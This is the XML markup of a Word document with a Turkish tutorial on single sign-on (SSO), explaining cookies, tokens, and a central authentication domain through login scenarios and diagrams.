        <w:t>Bugünün ortamı coğrafya açısından daha dağıtık bir ortam. Bu ortam birden çok sistemin ve uygulamanın birbiri ile ağ üzerinden etkileşimi ile oluşuyor. Tüm bu çeşitli sistemlerin kullanıcıyı tanımlamak için farklı mekanizmaları var. Bu sistemler her birine özgü şifresi olan muhtemelen eşsiz derecede eşsiz kurallar tarafından yönetiliyor. Bu durum sık sık problemler yaratıyordu. Bunu kolaylaştırmak için tekli oturum açma kavramı tasarlandı.</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aşlangıçta yaklaşık 50 yıl önce sistem tasarımcıları kullanıcıların bilgisayar sistemleri ile etkileşimini izlemenin bir yolu olduğunu farketti. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00BB784B" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB784B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Kullanıcılar tek bir alanda olduğu için her kullanıcıya bir kullanıcı adı ve şifre verilerek ve bu kullanıcı ile ilgili işlemlerin kayıtları tutularak güvelik sağlayabiliyorlardı. Basit anlaşılır ve yönetimi kolaydı.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB784B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Bugünün ortamı coğrafya açısından daha dağıtık bir ortam. Bu ortam birden çok sistemin ve uygulamanın birbiri ile ağ üzerinden etkileşimi ile oluşuyor. Tüm bu çeşitli sistemlerin kullanıcıyı tanımlamak için farklı mekanizmaları var. Bu sistemler her birine özgü şifresi olan muhtemelen eşsiz derecede eşsiz kurallar tarafından yönetiliyor. Bu durum sık sık problemler yaratıyordu. Bunu kolaylaştırmak için tekli oturum açma kavramı tasarlandı.</w:t>
      </w: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Pr="00F9184E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">1.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>SSO Nedir ?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00BB784B" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB784B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Türkçe'ye "Tek Oturum Açma" olarak tercüme edilebilen SSO yani single sign-on, birbiriyle ilişkili fakat birbirinden bağımsız uygulamalar için kullanılabilen çoklu erişim kontrolüdü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SSO tek bir kullanıcı ile oturum açarak çok sayıda uygulama/site’ye erişime olanak sağla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SSO’nun merkezinde girişin kontrolünü yapacak olan SSO sunucusu yer alır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB784B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Kullanıcılar herhangi bir uygulama/site ye giriş yapmak istediklerinde bu SSO sunucusuna yönlendirilirler. Burada kullanıcılar giriş bilgileriyle sisteme giriş yaptıktan sonra bir Token oluşturulur ve SSO sunucusu kullanıcıyı bu Token ile birlikte giriş yapmış olduğu uygulamaya geri döndürü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Kullanıcılar herhangi bir uygulama/site ye giriş yapmak istediklerinde bu SSO sunucusuna yönlendirilirler. Burada kullanıcılar giriş bilgileriyle sisteme giriş yaptıktan sonra bir Token oluşturulur ve SSO sunucusu kullanıcıyı bu Token ile birlikte giriş yapmış olduğu uygulamaya geri döndürür. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB784B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Giriş yapılan uygulama kendisine gelen Tokenı kontrol eder ve eğer Token doğru ise kullanıcı çerezler yardımıyla uygulamaya giriş hakkına erişir. Bu kullanıcı farklı bir uygulamaya istek yaptığı zaman çerez ve Token kontrolü ile oturum açma işlemi gerçekleşmiş bir şekilde uygulamayı açacaktır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB784B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="325EEFFE" wp14:editId="7F29C188">
            <wp:extent cx="3780149" cy="2441542"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13" name="Resim 3" descr="simple sso">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF43964B-C657-4936-AAFA-2F7A481953E3}"/>
                </a:ext>
              </a:extLst>
            </wp:docPr>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="4" name="Resim 3" descr="simple sso">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF43964B-C657-4936-AAFA-2F7A481953E3}"/>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6833" cy="2445859"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00BB784B" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB784B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Bu sistemde uygulamaların kullanıcı bilgileri tek bir database’de birleştirilir. Bu birleşme sayesinde giriş yaparken kullanılan şifreleme algoritmaları tek bir algoritmaya iner. Bu sayede birçok farklı şifreleme algoritması kullanmak yerine tek bir algoritmayla bu sıkıntı çözülü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Ayrıca SSO Server olarak tanımlanan uygulamaya erişim engeli konularak başka uygulamalardan veya url lerden yapılacak istekler engellenerek bir güvenlik önlemi de alınmış olur. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB784B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Bu sisteme tanımlanan uygulamalara izin verilip diğer uygulamalar engellenerek bir güvenlik katmanı oluşturulur.</w:t>
      </w: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Pr="004068C4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004068C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>1.3 SSO Senaryoları</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00BB784B" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">1.3.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB784B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>SSO Uygulanmayan Login Senaryosu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00BB784B" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB784B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>SSO uygulanmadan yapılan giriş işlemleri şu şekilde işle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Kullanıcı “A“ uygulamasına giriş yapar ve bu uygulamaya ait olan çerez(cookie) tarayıcıda tutulu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Kullanıcı “B” uygulamasına girmek istediğinde bu uygulamaya ait çerez olmadığı için “B” uygulaması kendi bilgilerini barındıran çerezi oluşturur ve tarayıcıya ekler.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB784B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kullanıcı her iki sisteme aynı bilgileriyle girmesine rağmen, ikisi için de ayrı ayrı giriş yapması gerekmektedir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB784B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FF26B93" wp14:editId="1215D945">
            <wp:extent cx="3601039" cy="2205873"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="22" name="Resim 3" descr="non-sso image">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{963182A7-85D5-460C-9BC4-3E19B17E93C7}"/>
                </a:ext>
              </a:extLst>
            </wp:docPr>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="4" name="Resim 3" descr="non-sso image">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{963182A7-85D5-460C-9BC4-3E19B17E93C7}"/>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672" cy="2228925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00BB784B" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">1.3.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB784B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Temel SSO Uygulanan Login Senaryosu</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Aslında SSO senaryosu için yapılmak istenen şey bu çerezleri farklı domainlerde paylaşabilmek. Fakat tarayıcı bu işlemi yapmamıza izin vermez. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00BB784B" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB784B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Gerekçesi de güvenlik. “A” domaininde yaratılan bir çerez sadece bu domainden erişilebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB784B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Yani “B” uygulaması “A” uygulamasına ait olan çereze erişip bu çerezde tutulan bilgileri okuyamaz. Bu tam tersi için de geçerlidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB784B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B3CF113" wp14:editId="1BF94AE9">
            <wp:extent cx="4355184" cy="2790334"/>
            <wp:effectExtent l="0" t="0" r="1270" b="3810"/>
            <wp:docPr id="23" name="Resim 3" descr="cookie">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09283BD5-D0BF-46FD-BC8B-DA5F2FCE3E5A}"/>
                </a:ext>
              </a:extLst>
            </wp:docPr>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="4" name="Resim 3" descr="cookie">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09283BD5-D0BF-46FD-BC8B-DA5F2FCE3E5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4117" cy="2796057"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00BB784B" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004068C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">1.3.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB784B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Merkez Domainli SSO Uygulaması</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irçok farklı SSO uygulaması ve yöntemi bulunmaktadır. Fakat etkili olan yöntemde bir adet merkez domain bulunur. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00BB784B" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB784B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Bu merkez domain üzerinden tüm authentication işlemleri gerçekleştirilir. Oluşturulacak olan çerez bu domain üzerinde oluşturulur ve diğer domainler ile bu oluşturulan bilgi paylaşılı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Bu paylaşılan bilgi için Token kullanılabili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Bu token ve giriş yapan kullanıcıyı belirleyecek bilgileri içeren bir dönüş merkez domaine istek yapan diğer domainlere gönderilebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB784B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bu Token’i alan diğer domainler bu verinin doğruluğunu sağlayıp giriş işlemini tamamlarlar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB784B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45BB7A6D" wp14:editId="445480C3">
            <wp:extent cx="2969444" cy="2422688"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="14" name="Resim 4" descr="http://pms.sistemacik.com/content/images/2016/08/using-central-auth-domain.png">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{019620B1-AD29-4A8D-BD34-D075B685D68B}"/>
                </a:ext>
              </a:extLst>
            </wp:docPr>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="5" name="Resim 4" descr="http://pms.sistemacik.com/content/images/2016/08/using-central-auth-domain.png">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{019620B1-AD29-4A8D-BD34-D075B685D68B}"/>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9206" cy="2479605"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00BB784B" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004068C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">1.3.4 </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB784B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>SSO Yaygın Kullanım</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00BB784B" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB784B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Eğer kullanıcı giriş isteyen bir sayfaya gitmek istediğinde veya giriş yapmak istediğinde bu merkez domaine yönlendirilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB784B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Eğer kullanıcı zaten giriş yapmışsa bu domainde kayıtlı olan çerezde yer alan bilgi yani “Token” geri döndürülür.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB784B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78DC9885" wp14:editId="41D424CC">
            <wp:extent cx="5194169" cy="3044858"/>
            <wp:effectExtent l="0" t="0" r="635" b="3175"/>
            <wp:docPr id="24" name="Resim 3" descr="sso system">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{434F9E81-330C-4E0C-A561-DED111BA3706}"/>
                </a:ext>
              </a:extLst>
            </wp:docPr>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="4" name="Resim 3" descr="sso system">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{434F9E81-330C-4E0C-A561-DED111BA3706}"/>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9465" cy="3047962"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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asit olarak anlatılmak gerekirse kullanıcı A sitesine girer. </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urada giriş olmak istediğinde M(Main) uygulamaya yönlendirilir. </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Bu uygulama kendi adına kayıtlı olan çerez var mı diye kontrol eder. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00BB784B" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB784B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Eğer yoksa A uygulamasının giriş sayfasına yönlendiri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Bu sayfada kullanıcı verilerini girdikten sonra M uygulamasında bulunan servis sayesinde giriş bilgilerine karşılık gelen kullanıcı objesini ve bu kullanıcıya ait Token’ı gönderir.</w:t>
      </w:r>
    </w:p>
